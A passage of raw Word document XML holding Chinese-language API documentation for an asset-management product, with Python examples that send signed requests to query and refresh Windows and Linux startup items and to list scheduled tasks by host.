        <w:t xml:space="preserve">    # 参看登录认证里面的登录方法代码示例</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    login_result = login()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    sign_key = login_result.get("data").get("signKey")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    jwt = login_result.get("data").get("jwt")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    comid = login_result.get("data").get("comId")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 当前时间戳</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ts = int(time.time())</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    if data is not None:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        info = ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        if method == "GET":</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            # 对参数key进行字典排序</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            keys = sorted(data.keys())</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            for key in keys:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                info = info + key + str(data.get(key))</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                print info</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        elif method == "POST" or method == "PUT" or method == "DELETE":</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            info = json.dumps(data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        # 拼接待签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        to_sign = comid + info + str(ts) + sign_key</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        # 拼接待签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        to_sign = comid + str(ts) + sign_key</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t xml:space="preserve">    print to_sign</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 对待签名字符串进行sha1得到签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    sign = hashlib.sha1(to_sign).hexdigest()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 组装http请求头参数</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    header = {"Content-Type": "application/json", "comId": comid, "timestamp": ts,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">              "sign": sign, "Authorization": "Bearer " + jwt}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn = httplib.HTTPConnection(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn.request(method=method, url=url, body=json.dumps(data), headers=header)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    response = conn.getresponse()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = response.read()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def service_win():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/external/api/assets/service/win?showName=Google%%20Chrome&amp;enable=true&amp;startType=1,2&amp;publisher=Google&amp;user=""" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {'showName': 'Google Chrome', 'enable': 'true', 'startType': '1,2', 'publisher': 'Google', 'user': ''}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = send_request("GET", url, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "result: ",res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>if __name__ == '__main__':</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    service_win()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C857F45" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:r>
        <w:t>linux启动项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38705FAC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>def service_linux():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/external/api/assets/service/linux?initLevel=2&amp;name=bootmisc.sh&amp;defaultOpen=true,false&amp;isXinetd=false,true" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {'initLevel': 2, 'name': 'bootmisc.sh', 'defaultOpen': 'true,false', 'isXinetd': 'false,true'}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = send_request("GET", url, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "result: ",res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1308A6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>对于签名的部分，有疑问可以参考</w:t>
      </w:r>
      <w:hyperlink w:anchor="身份认证">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>身份认证</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:hyperlink w:anchor="请求签名">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>请求签名</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573FA6DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="启动项信息扫描"/>
      <w:bookmarkEnd w:id="57"/>
      <w:r>
        <w:t>启动项信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF14EF7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于请求启动项信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276F3C0A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715F0B18" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/assets/service/{win|linux}/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66399226" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A8B484" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6821F754" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1A4760" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/service/linux/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D31235C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4126796E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0D5835" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FDF4FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorCode": 500,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorMessage": "no online agent", //      错误描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "detail":null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ACAB55"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20F8BF7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635CDC5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4923DC00" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FBBD93E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="648A1948" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5D996F54" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01D51531" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="669AA2AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55600205" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F3A609E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6250D2DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:r>
        <w:t>linux启动项信息扫描更新数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B650F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>def refresh():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/external/api/assets/service/linux/refresh" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = send_request("POST", url, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4CBDB0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:r>
        <w:t>win启动项信息扫描更新数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D15FE5A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>def refresh():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/external/api/assets/service/win/refresh" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = send_request("POST", url, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCB8E5F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="启动项信息查询扫描状态"/>
      <w:bookmarkEnd w:id="58"/>
      <w:r>
        <w:t>启动项信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F21BDE3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>用于查询启动项信息的扫描状态；具体请求方式参照3.1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7E6C1A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="计划任务信息"/>
      <w:bookmarkEnd w:id="56"/>
      <w:bookmarkEnd w:id="59"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>计划任务信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49061BF4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6B38E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该功能API用于查询资产中的计划任务信息，获取查询的结果并展示；每条数据均包含主机信息，您可以灵活的使用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E71F664" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05062E54" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>计划任务信息查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592BF161" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D7FE2B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3E68A0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57409405" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>计划任务信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637B721C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>计划任务信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D58466" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>计划任务信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474509EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9AD73D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接查询当前信息则直接调用计划任务信息查询结果接口（即1号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55400897"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149662FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686097D1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="计划任务信息查询结果"/>
      <w:r>
        <w:t>计划任务信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAD1C31" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于查询计划任务信息，按每台主机每个计划任务进行展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781F79E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A93DD7E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/assets/task/{linux}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A5177F"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173"/>
        <w:gridCol w:w="1339"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="4051"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4AE462C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9832C1D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68405197" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0686EDC4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="015C3EDD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1812C2CE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36AE3281" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53D4455F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1176246F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C605E68" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="73A76465" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22C8189A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71649586" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AC91DC1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50875A7E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6A024FF4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77C3619C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D84A5AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04D45EAD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6240C63F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="059A8017" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75C22126" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="337EA305" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C40C62B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
